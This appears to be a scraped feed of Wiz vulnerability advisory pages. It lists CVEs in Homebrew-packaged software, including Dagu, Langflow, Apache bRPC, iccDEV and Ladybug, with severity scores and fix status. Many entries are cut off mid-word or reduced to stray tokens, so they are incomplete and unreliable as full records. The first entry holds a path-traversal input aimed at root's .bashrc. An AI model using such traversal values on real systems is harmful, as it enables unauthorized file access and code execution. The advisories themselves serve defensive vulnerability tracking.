## CVE-2026-33945 :
Homebrew vulnerability analysis and mitigation
systemd.credential.../../../../../../root/.bashrc
credentials
systemd.credential.XYZ
XYZ
Source : NVD
## 9.6
Score
Published March 27, 2026
Severity CRITICAL
CNA Score 9.9
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
incus
lxd
Sources
NVD
Debian 12, 13 Severity CRITICAL No Fix Added at: Mar 29, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 29, 2026
Echo Severity CRITICAL No Fix Added at: Mar 29, 2026
GoLang Severity CRITICAL Has Fix Added at: Mar 29, 2026
Homebrew Severity CRITI
Wiz
CVE-2026-3384 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3384 [MEDIUM] CVE-2026-3384 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3384 :
Homebrew vulnerability analysis and mitigation
A security vulnerability has been detected in ChaiScript up to 6.1.0. This impacts the function chaiscript::eval::AST_Node_Impl::eval/chaiscript::eval::Function_Push_Pop of the file include/chaiscript/language/chaiscript_eval.hpp. The manipulation leads to uncontrolled recursion. An attack has to be approached locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
Wiz
CVE-2025-65119 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-65119 [MEDIUM] CVE-2025-65119 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65119 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-33484 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33484 [HIGH] CVE-2026-33484 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33484 :
Homebrew vulnerability analysis and mitigation
/api/v1/files/images/{flow_id}/{file_name}
flow_id
Source : NVD
## 7.5
Score
Published March 24, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
LangFlow
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
langflow
Sources
NVD
pip Severity HIGH No Fix Added at: Mar 21, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Sco
Wiz
CVE-2026-33344 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33344 [HIGH] CVE-2026-33344 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33344 :
Homebrew vulnerability analysis and mitigation
Dagu is a workflow engine with a built-in Web user interface. From version 2.0.0 to before version 2.3.1, the fix for CVE-2026-27598 added ValidateDAGName to CreateNewDAG and rewrote generateFilePath to use filepath.Base. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the {fileName} URL path parameter to locateDAG without calling ValidateDAGName. %2F-encoded forward slashes in the {fileName} segment traverse outside the DAGs directory. This issue has been patched in version 2.3.1.
Source : NVD
## 8.1
Score
Published March 24, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date
Wiz
CVE-2026-27009 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-27009 [MEDIUM] CVE-2026-27009 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27009 :
Homebrew vulnerability analysis and mitigation
script-src 'self'
Source : NVD
## 5.8
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity MEDIUM Has Fix Added at: Feb 19, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severi
Wiz
CVE-2026-24407 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-24407 [HIGH] CVE-2026-24407 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24407 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior in icSigCalcOp(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percent
Wiz
CVE-2026-31794 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-31794 [MEDIUM] CVE-2026-31794 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31794 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a segmentation fault from invalid/wild pointer read in CIccCLUT::Interp3d() causing a denial of service. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 5.5
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritize
Wiz
CVE-2026-32715 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.8
CVE-2026-32715 [LOW] CVE-2026-32715 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32715 :
Homebrew vulnerability analysis and mitigation
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, The two generic system-preferences endpoints allow manager role access, while every other surface that touches the same settings is restricted to admin only. Because of this inconsistency, a manager can call the generic endpoints directly to read plaintext SQL database credentials and overwrite admin-only global settings such as the default system prompt and the Community Hub API key.
Source : NVD
## 3.8
Score
Published March 16, 2026
Severity LOW
CNA Score 3.8
Affected Technologies
Homebrew
AnythingLLM
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Relea
Wiz
CVE-2026-21502 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21502 [MEDIUM] CVE-2026-21502 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21502 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML tag parser. This issue has been patched in version 2.3.1.2.
Source : NVD
## 5.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 12, 2026
## Get a CVE risk assess
Wiz
CVE-2026-21500 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21500 [MEDIUM] CVE-2026-21500 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21500 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to stack overflow in the XML calculator macro expansion. This issue has been patched in version 2.3.1.2.
Source : NVD
## 7.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 12, 2026
## Get a CVE risk ass
Wiz
CVE-2019-25447 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2019-25447 [MEDIUM] CVE-2019-25447 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2019-25447 :
Homebrew vulnerability analysis and mitigation
OrientDB 3.0.17 GA Community Edition contains cross-site request forgery vulnerabilities that allow attackers to perform unauthorized actions by crafting malicious requests to endpoints like /database/, /command/, and /document/. Attackers can create or delete databases, modify schema classes, manage users, and create functions by sending authenticated requests without token validation, combined with reflected and stored cross-site scripting vulnerabilities in the web interface.
Source : NVD
## 5.3
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabili
Wiz
CVE-2026-21487 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21487 [MEDIUM] CVE-2026-21487 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21487 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below have an Out-of-bounds Read, Use of Out-of-range Pointer Offset and have Improper Input Validation in its CIccProfile::LoadTag function. This issue is fixed in version 2.3.1.2.
Source : NVD
## 7.1
Score
Published January 6, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk
Wiz
CVE-2026-33194 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-33194 [MEDIUM] CVE-2026-33194 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33194 :
Homebrew vulnerability analysis and mitigation
IsSensitivePath()
kernel/util/path.go
/opt
/usr
/home
/mnt
/media
globalCopyFiles
importStdMd
IsSensitivePath
Source : NVD
## 6.8
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.com/siyuan-note/siyuan/kernel
siyuan
Sources
NVD
GoLang Severity MEDIUM Has Fix Added at: Mar 19, 2026
Homebrew Severity MEDIUM Has Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what
Wiz
CVE-2025-60021 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-60021 [CRITICAL] CVE-2025-60021 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-60021 :
Homebrew vulnerability analysis and mitigation
Remote command injection vulnerability in heap profiler builtin service in Apache bRPC ((all versions < 1.15.0)) on all platforms allows attacker to inject remote command.
Root Cause: The bRPC heap profiler built-in service (/pprof/heap) does not validate the user-provided extra_options parameter and executes it as a command-line argument. Attackers can execute remote commands using the extra_options parameter..
Affected scenarios: Use the built-in bRPC heap profiler service to perform jemalloc memory profiling.
How to Fix: we provide two methods, you can choose one of them:
Upgrade bRPC to version 1.15.0.
Apply this patch ( https://github.com/apache/brpc/pull/3101 ) manually.
Source : NVD
## 9.8
Score
Publishe
Wiz
CVE-2026-21677 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21677 [HIGH] CVE-2026-21677 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21677 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have Undefined Behavior in its CIccCLUT::Init function which initializes and sets the size of a CLUT. This issue is fixed in version 2.3.1.1.
Source : NVD
## 8.8
Score
Published January 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view
Wiz
CVE-2025-66214 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2025-66214 [HIGH] CVE-2025-66214 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66214 :
Homebrew vulnerability analysis and mitigation
Ladybug adds message-based debugging, unit, system, and regression testing to Java applications. Versions prior to 3.0-20251107.114628 contain the APIs /iaf/ladybug/api/report/{storage} and /iaf/ladybug/api/report/upload, which allow uploading gzip-compressed XML files with user-controllable content. The system deserializes these XML files, enabling attackers to achieve Remote Code Execution (RCE) by submitting carefully crafted XML payloads and thereby gain access to the target server. This issue is fixed in version 3.0-20251107.114628.
Source : NVD
## 8.8
Score
Published December 9, 2025
Severity HIGH
CNA Score 7.0
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Releas
2026-04-01
Published